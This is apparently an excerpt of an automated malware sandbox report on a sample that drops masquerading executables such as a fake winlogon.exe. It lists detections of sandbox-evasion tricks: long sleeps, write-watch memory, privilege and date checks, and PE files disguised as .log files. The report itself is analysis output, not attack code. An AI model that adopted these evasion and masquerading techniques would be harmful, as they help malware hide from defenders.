Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 12C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1B050000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: DD0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: 1A960000 memory reserve | memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: C80000 memory reserve | memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: 1A6E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1070000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1ADE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1AB50000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: FE0000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: 1AFB0000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: E50000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: 1A910000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: EB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1A8C0000 memory reserve | memory write watch
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: 1480000 memory reserve | memory write watch
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: 1B0E0000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: 21E0000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: 1A3C0000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599563 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599452 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599331 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 597297 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 597175 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Window / User API: threadDelayed 3628 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Window / User API: threadDelayed 2325 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tnEMlbYs.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aEtIhTbg.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vybNluDs.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WslZMRrk.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MFrsFgjH.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lKwWBiIK.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TDfrhvdw.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LdxTVLQK.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tRVOBpwv.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RAtJMMZA.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rGzNBWQu.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BudDliLc.log Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Evasive API call chain: GetLocalTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599671s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599563s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599452s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599331s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99859s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99750s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99640s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99531s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99422s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99312s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99203s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99094s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98984s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98547s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98437s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98328s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98219s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98109s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -597297s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -597175s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7188 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7804 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 7976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 8012 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 2004 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\winlogon.exe TID: 7660 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\winlogon.exe TID: 7640 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7988 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 1732 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\winlogon.exe TID: 8052 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\winlogon.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\winlogon.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\winlogon.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00A2BA94
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00A3D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0031BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 3_2_0031BA94
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0032D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 3_2_0032D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 4_2_0072A69B
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 4_2_0073C220
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3F82F VirtualQuery,GetSystemInfo, 0_2_00A3F82F
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599563 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599452 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599331 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99859 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99750 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99640 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99531 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99422 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99312 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99203 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99094 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98984 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98875 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98765 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98656 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98547 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98437 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98328 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98219 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98109 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 597297 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 597175 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: work.exe, 00000003.00000003.1630533570.0000000002D5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y.,
Source: dwartg.exe, 00000004.00000003.1628390760.0000000002E82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: dwartg.exe, 00000004.00000003.1628390760.0000000002E82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
